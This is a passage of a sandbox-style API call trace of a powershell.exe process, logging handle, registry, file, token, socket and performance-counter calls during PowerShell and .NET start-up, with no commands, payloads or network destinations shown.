	[0783.625] CloseHandle (hObject=0x38c) returned 1
	[0783.625] CloseHandle (hObject=0x490) returned 1
	[0783.625] CloseHandle (hObject=0x3d4) returned 1
	[0783.626] CloseHandle (hObject=0x3d0) returned 1
	[0783.626] CloseHandle (hObject=0x494) returned 1
	[0783.626] CloseHandle (hObject=0x430) returned 1
	[0904.685] CertFreeCRLContext (pCrlContext=0x1b83bbc0) returned 1
	[0904.686] CertFreeCRLContext (pCrlContext=0x1b83bc40) returned 1
	[0904.686] CertFreeCRLContext (pCrlContext=0x1ce84180) returned 1
	[0904.687] CertFreeCRLContext (pCrlContext=0x1b83bbc0) returned 1
	[0904.687] CertFreeCRLContext (pCrlContext=0x1ce84200) returned 1
	[0904.688] CloseHandle (hObject=0x3dc) returned 1
	[0904.688] CertCloseStore (hCertStore=0x1b8614f0, dwFlags=0x0) returned 1

Thread:
	id = 836
	os_tid = 0x1620


Thread:
	id = 926
	os_tid = 0x18c0

	[0501.907] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0501.911] SetThreadUILanguage (LangId=0x0) returned 0x7fffffa0409
	[0501.916] CoTaskMemAlloc (cb=0x104) returned 0x253240
	[0501.916] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x253240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0501.916] CoTaskMemFree (pv=0x253240) 
	[0501.918] VirtualQuery (in: lpAddress=0x1c86dcc0, lpBuffer=0x1c86eb80, dwLength=0x30 | out: lpBuffer=0x1c86eb80*(BaseAddress=0x1c86d000, AllocationBase=0x1bee0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0501.923] CoTaskMemAlloc (cb=0x104) returned 0x253240
	[0501.923] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x253240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0501.923] CoTaskMemFree (pv=0x253240) 
	[0501.926] CoTaskMemAlloc (cb=0x104) returned 0x253240
	[0501.926] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x253240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0501.926] CoTaskMemFree (pv=0x253240) 
	[0501.929] CoTaskMemAlloc (cb=0x104) returned 0x253240
	[0501.929] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x253240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0501.929] CoTaskMemFree (pv=0x253240) 
	[0501.938] CoTaskMemAlloc (cb=0x104) returned 0x253240
	[0501.938] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x253240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0501.938] CoTaskMemFree (pv=0x253240) 
	[0501.940] CoTaskMemAlloc (cb=0x104) returned 0x253240
	[0501.940] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x253240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0501.940] CoTaskMemFree (pv=0x253240) 
	[0501.942] CoTaskMemAlloc (cb=0x104) returned 0x253240
	[0501.942] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x253240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0501.942] CoTaskMemFree (pv=0x253240) 
	[0501.947] VirtualQuery (in: lpAddress=0x1c86df70, lpBuffer=0x1c86ee30, dwLength=0x30 | out: lpBuffer=0x1c86ee30*(BaseAddress=0x1c86d000, AllocationBase=0x1bee0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0501.948] CoTaskMemAlloc (cb=0x104) returned 0x253240
	[0501.948] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x253240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0501.948] CoTaskMemFree (pv=0x253240) 
	[0501.951] CoTaskMemAlloc (cb=0x104) returned 0x253240
	[0501.951] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x253240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0501.951] CoTaskMemFree (pv=0x253240) 
	[0501.951] CoTaskMemAlloc (cb=0x104) returned 0x253240
	[0501.951] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x253240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0501.951] CoTaskMemFree (pv=0x253240) 
	[0501.953] CoTaskMemAlloc (cb=0x104) returned 0x253240
	[0501.953] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x253240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0501.953] CoTaskMemFree (pv=0x253240) 
	[0501.957] CoTaskMemAlloc (cb=0x104) returned 0x253240
	[0501.957] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x253240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0501.957] CoTaskMemFree (pv=0x253240) 
	[0502.646] CoTaskMemAlloc (cb=0x104) returned 0x253240
	[0502.646] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x253240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0502.646] CoTaskMemFree (pv=0x253240) 
	[0502.648] CoTaskMemAlloc (cb=0x104) returned 0x253240
	[0502.648] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x253240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0502.648] CoTaskMemFree (pv=0x253240) 
	[0502.650] CoTaskMemAlloc (cb=0x104) returned 0x253240
	[0502.650] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x253240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0502.650] CoTaskMemFree (pv=0x253240) 
	[0502.652] CoTaskMemAlloc (cb=0x104) returned 0x253240
	[0502.652] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x253240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0502.652] CoTaskMemFree (pv=0x253240) 
	[0502.654] CoTaskMemAlloc (cb=0x104) returned 0x253240
	[0502.654] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x253240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0502.654] CoTaskMemFree (pv=0x253240) 
	[0502.655] CoTaskMemAlloc (cb=0x104) returned 0x253240
	[0502.655] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x253240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0502.655] CoTaskMemFree (pv=0x253240) 
	[0502.657] CoTaskMemAlloc (cb=0x104) returned 0x253240
	[0502.657] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x253240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0502.657] CoTaskMemFree (pv=0x253240) 
	[0503.330] CoTaskMemAlloc (cb=0x104) returned 0x253240
	[0503.330] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x253240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0503.330] CoTaskMemFree (pv=0x253240) 
	[0505.163] CoTaskMemAlloc (cb=0x104) returned 0x253240
	[0505.163] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x253240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0505.163] CoTaskMemFree (pv=0x253240) 
	[0507.362] CoTaskMemAlloc (cb=0x104) returned 0x253240
	[0507.362] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x253240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0507.362] CoTaskMemFree (pv=0x253240) 
	[0508.548] CoTaskMemAlloc (cb=0x104) returned 0x253240
	[0508.548] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x253240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0508.548] CoTaskMemFree (pv=0x253240) 
	[0508.551] CoTaskMemAlloc (cb=0x104) returned 0x253240
	[0508.551] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x253240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0508.551] CoTaskMemFree (pv=0x253240) 
	[0625.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c86d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0625.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c86d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0629.375] CoTaskMemAlloc (cb=0x20c) returned 0x1b807b10
	[0629.375] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b807b10, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0629.375] CoTaskMemFree (pv=0x1b807b10) 
	[0629.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c86d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0633.233] GetCurrentProcess () returned 0xffffffffffffffff
	[0633.233] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c86d908 | out: TokenHandle=0x1c86d908*=0x338) returned 1
	[0637.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x1c86d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", lpFilePart=0x0) returned 0x30
	[0637.487] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c86d9b0 | out: lpFileInformation=0x1c86d9b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x76d072b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x622a)) returned 1
	[0637.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c86d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
	[0637.489] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c86d960 | out: lpFileInformation=0x1c86d960*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x76d072b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x622a)) returned 1
	[0637.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c86d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
	[0637.490] SetErrorMode (uMode=0x1) returned 0x1
	[0637.491] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x33c
	[0637.491] GetFileType (hFile=0x33c) returned 0x1
	[0637.491] SetErrorMode (uMode=0x1) returned 0x1
	[0637.491] GetFileType (hFile=0x33c) returned 0x1
	[0637.493] GetFileSize (in: hFile=0x33c, lpFileSizeHigh=0x1c86d958 | out: lpFileSizeHigh=0x1c86d958*=0x0) returned 0x622a
	[0637.493] ReadFile (in: hFile=0x33c, lpBuffer=0x303a388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c86d878, lpOverlapped=0x0 | out: lpBuffer=0x303a388*, lpNumberOfBytesRead=0x1c86d878*=0x1000, lpOverlapped=0x0) returned 1
	[0637.534] ReadFile (in: hFile=0x33c, lpBuffer=0x303a388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c86d3a8, lpOverlapped=0x0 | out: lpBuffer=0x303a388*, lpNumberOfBytesRead=0x1c86d3a8*=0x1000, lpOverlapped=0x0) returned 1
	[0637.536] ReadFile (in: hFile=0x33c, lpBuffer=0x303a388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c86d3a8, lpOverlapped=0x0 | out: lpBuffer=0x303a388*, lpNumberOfBytesRead=0x1c86d3a8*=0x1000, lpOverlapped=0x0) returned 1
	[0637.536] ReadFile (in: hFile=0x33c, lpBuffer=0x303a388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c86d3a8, lpOverlapped=0x0 | out: lpBuffer=0x303a388*, lpNumberOfBytesRead=0x1c86d3a8*=0x1000, lpOverlapped=0x0) returned 1
	[0637.536] ReadFile (in: hFile=0x33c, lpBuffer=0x303a388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c86d3a8, lpOverlapped=0x0 | out: lpBuffer=0x303a388*, lpNumberOfBytesRead=0x1c86d3a8*=0x1000, lpOverlapped=0x0) returned 1
	[0637.543] ReadFile (in: hFile=0x33c, lpBuffer=0x303a388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c86d4e8, lpOverlapped=0x0 | out: lpBuffer=0x303a388*, lpNumberOfBytesRead=0x1c86d4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0637.543] ReadFile (in: hFile=0x33c, lpBuffer=0x303a388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c86d368, lpOverlapped=0x0 | out: lpBuffer=0x303a388*, lpNumberOfBytesRead=0x1c86d368*=0x22a, lpOverlapped=0x0) returned 1
	[0637.543] ReadFile (in: hFile=0x33c, lpBuffer=0x303a388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c86d408, lpOverlapped=0x0 | out: lpBuffer=0x303a388*, lpNumberOfBytesRead=0x1c86d408*=0x0, lpOverlapped=0x0) returned 1
	[0637.544] CloseHandle (hObject=0x33c) returned 1
	[0637.552] CoTaskMemAlloc (cb=0x20c) returned 0x1b807b10
	[0637.552] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b807b10, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0637.552] CoTaskMemFree (pv=0x1b807b10) 
	[0637.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c86d990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0637.553] GetCurrentProcess () returned 0xffffffffffffffff
	[0637.553] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c86db68 | out: TokenHandle=0x1c86db68*=0x33c) returned 1
	[0637.554] GetCurrentProcess () returned 0xffffffffffffffff
	[0637.554] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c86db68 | out: TokenHandle=0x1c86db68*=0x318) returned 1
	[0637.556] GetCurrentProcess () returned 0xffffffffffffffff
	[0637.556] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c86d908 | out: TokenHandle=0x1c86d908*=0x340) returned 1
	[0637.556] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1c86d9b0 | out: lpFileInformation=0x1c86d9b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0637.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c86d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0637.558] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1c86d960 | out: lpFileInformation=0x1c86d960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0637.558] GetCurrentProcess () returned 0xffffffffffffffff
	[0637.558] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c86db68 | out: TokenHandle=0x1c86db68*=0x370) returned 1
	[0637.559] GetCurrentProcess () returned 0xffffffffffffffff
	[0637.559] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c86db68 | out: TokenHandle=0x1c86db68*=0x380) returned 1
	[0637.574] GetCurrentProcess () returned 0xffffffffffffffff
	[0637.574] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c86d7e8 | out: TokenHandle=0x1c86d7e8*=0x384) returned 1
	[0657.125] GetCurrentProcess () returned 0xffffffffffffffff
	[0657.125] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c86d7e8 | out: TokenHandle=0x1c86d7e8*=0x338) returned 1
	[0658.751] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x370
	[0658.751] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x33c
	[0668.172] GetCurrentProcess () returned 0xffffffffffffffff
	[0668.172] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c86d7b8 | out: TokenHandle=0x1c86d7b8*=0x318) returned 1
	[0676.561] GetCurrentProcess () returned 0xffffffffffffffff
	[0676.561] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c86d7b8 | out: TokenHandle=0x1c86d7b8*=0x380) returned 1
	[0680.303] GetCurrentProcess () returned 0xffffffffffffffff
	[0680.303] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c86d6f8 | out: TokenHandle=0x1c86d6f8*=0x340) returned 1
	[0680.311] GetCurrentProcess () returned 0xffffffffffffffff
	[0680.312] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c86d6f8 | out: TokenHandle=0x1c86d6f8*=0x388) returned 1
	[0683.448] GetCurrentProcess () returned 0xffffffffffffffff
	[0683.449] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c86dd38 | out: TokenHandle=0x1c86dd38*=0x38c) returned 1
	[0703.051] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c86bdf8 | out: phkResult=0x1c86bdf8*=0x338) returned 0x0
	[0703.051] RegQueryValueExW (in: hKey=0x338, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c86bd7c, lpData=0x0, lpcbData=0x1c86bd78*=0x0 | out: lpType=0x1c86bd7c*=0x1, lpData=0x0, lpcbData=0x1c86bd78*=0xe) returned 0x0
	[0703.051] CoTaskMemAlloc (cb=0x12) returned 0x1b84be50
	[0703.051] RegQueryValueExW (in: hKey=0x338, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c86bd4c, lpData=0x1b84be50, lpcbData=0x1c86bd48*=0xe | out: lpType=0x1c86bd4c*=0x1, lpData="Client", lpcbData=0x1c86bd48*=0xe) returned 0x0
	[0703.051] CoTaskMemFree (pv=0x1b84be50) 
	[0703.051] RegCloseKey (hKey=0x338) returned 0x0
	[0703.061] CoTaskMemAlloc (cb=0xcd0) returned 0x1b843080
	[0708.807] RasEnumConnectionsW (in: param_1=0x1b843080, param_2=0x1c86dd8c, param_3=0x1c86dd88 | out: param_1=0x1b843080, param_2=0x1c86dd8c, param_3=0x1c86dd88) returned 0x0
	[0708.815] CoTaskMemFree (pv=0x1b843080) 
	[0708.822] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x1c86db98 | out: lpWSAData=0x1c86db98) returned 0
	[0708.844] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x3d0
	[0708.849] setsockopt (s=0x3d0, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0708.849] closesocket (s=0x3d0) returned 0
	[0711.600] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x3d0
	[0711.602] setsockopt (s=0x3d0, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0711.602] closesocket (s=0x3d0) returned 0
	[0711.609] GetCurrentProcess () returned 0xffffffffffffffff
	[0711.609] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c86d418 | out: TokenHandle=0x1c86d418*=0x3d0) returned 1
	[0711.622] GetCurrentProcess () returned 0xffffffffffffffff
	[0711.622] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c86d418 | out: TokenHandle=0x1c86d418*=0x3d4) returned 1
	[0719.139] GetCurrentProcessId () returned 0xf6c
	[0722.326] CoTaskMemAlloc (cb=0x204) returned 0x208730
	[0722.326] GetComputerNameW (in: lpBuffer=0x208730, nSize=0x2f25000 | out: lpBuffer="XDUWTFONO", nSize=0x2f25000) returned 1
	[0722.326] CoTaskMemFree (pv=0x208730) 
	[0722.327] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c86d8f8 | out: phkResult=0x1c86d8f8*=0x3d8) returned 0x0
	[0722.327] RegQueryValueExW (in: hKey=0x3d8, lpValueName="Library", lpReserved=0x0, lpType=0x1c86d87c, lpData=0x0, lpcbData=0x1c86d878*=0x0 | out: lpType=0x1c86d87c*=0x1, lpData=0x0, lpcbData=0x1c86d878*=0x1c) returned 0x0
	[0722.327] CoTaskMemAlloc (cb=0x20) returned 0x1b83e130
	[0722.327] RegQueryValueExW (in: hKey=0x3d8, lpValueName="Library", lpReserved=0x0, lpType=0x1c86d84c, lpData=0x1b83e130, lpcbData=0x1c86d848*=0x1c | out: lpType=0x1c86d84c*=0x1, lpData="netfxperf.dll", lpcbData=0x1c86d848*=0x1c) returned 0x0
	[0722.327] CoTaskMemFree (pv=0x1b83e130) 
	[0722.327] RegQueryValueExW (in: hKey=0x3d8, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c86d87c, lpData=0x0, lpcbData=0x1c86d878*=0x0 | out: lpType=0x1c86d87c*=0x4, lpData=0x0, lpcbData=0x1c86d878*=0x4) returned 0x0
	[0722.328] RegQueryValueExW (in: hKey=0x3d8, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c86d880, lpData=0x1c86d87c, lpcbData=0x1c86d878*=0x4 | out: lpType=0x1c86d880*=0x4, lpData=0x1c86d87c*=0x1, lpcbData=0x1c86d878*=0x4) returned 0x0
	[0722.328] RegQueryValueExW (in: hKey=0x3d8, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c86d87c, lpData=0x0, lpcbData=0x1c86d878*=0x0 | out: lpType=0x1c86d87c*=0x4, lpData=0x0, lpcbData=0x1c86d878*=0x4) returned 0x0
	[0722.328] RegQueryValueExW (in: hKey=0x3d8, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c86d880, lpData=0x1c86d87c, lpcbData=0x1c86d878*=0x4 | out: lpType=0x1c86d880*=0x4, lpData=0x1c86d87c*=0x137a, lpcbData=0x1c86d878*=0x4) returned 0x0
	[0722.328] RegCloseKey (hKey=0x3d8) returned 0x0
	[0723.872] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c86d8b8 | out: phkResult=0x1c86d8b8*=0x3d8) returned 0x0
	[0723.872] RegQueryValueExW (in: hKey=0x3d8, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x1c86d83c, lpData=0x0, lpcbData=0x1c86d838*=0x0 | out: lpType=0x1c86d83c*=0x4, lpData=0x0, lpcbData=0x1c86d838*=0x4) returned 0x0
	[0723.872] RegQueryValueExW (in: hKey=0x3d8, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x1c86d840, lpData=0x1c86d83c, lpcbData=0x1c86d838*=0x4 | out: lpType=0x1c86d840*=0x4, lpData=0x1c86d83c*=0x3, lpcbData=0x1c86d838*=0x4) returned 0x0
	[0723.872] RegQueryValueExW (in: hKey=0x3d8, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x1c86d83c, lpData=0x0, lpcbData=0x1c86d838*=0x0 | out: lpType=0x1c86d83c*=0x4, lpData=0x0, lpcbData=0x1c86d838*=0x4) returned 0x0
	[0723.872] RegQueryValueExW (in: hKey=0x3d8, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x1c86d840, lpData=0x1c86d83c, lpcbData=0x1c86d838*=0x4 | out: lpType=0x1c86d840*=0x4, lpData=0x1c86d83c*=0x20000, lpcbData=0x1c86d838*=0x4) returned 0x0
	[0723.872] RegQueryValueExW (in: hKey=0x3d8, lpValueName="Counter Names", lpReserved=0x0, lpType=0x1c86d83c, lpData=0x0, lpcbData=0x1c86d838*=0x0 | out: lpType=0x1c86d83c*=0x3, lpData=0x0, lpcbData=0x1c86d838*=0xaa) returned 0x0
	[0723.872] RegQueryValueExW (in: hKey=0x3d8, lpValueName="Counter Names", lpReserved=0x0, lpType=0x1c86d83c, lpData=0x2f282f0, lpcbData=0x1c86d838*=0xaa | out: lpType=0x1c86d83c*=0x3, lpData=0x2f282f0*, lpcbData=0x1c86d838*=0xaa) returned 0x0
	[0723.877] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1
	[0725.532] CreateFileMappingW (hFile=0xffffffffffffffff, lpFileMappingAttributes=0x1c86d7f0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x0
	[0725.533] OpenFileMappingW (dwDesiredAccess=0x2, bInheritHandle=0, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x3e0
	[0725.536] MapViewOfFile (hFileMappingObject=0x3e0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x27c0000
	[0725.537] VirtualQuery (in: lpAddress=0x27c0000, lpBuffer=0x1c86d7e8, dwLength=0x30 | out: lpBuffer=0x1c86d7e8*(BaseAddress=0x27c0000, AllocationBase=0x27c0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000, __alignment2=0x0)) returned 0x30
	[0725.537] LocalFree (hMem=0x220bc0) returned 0x0
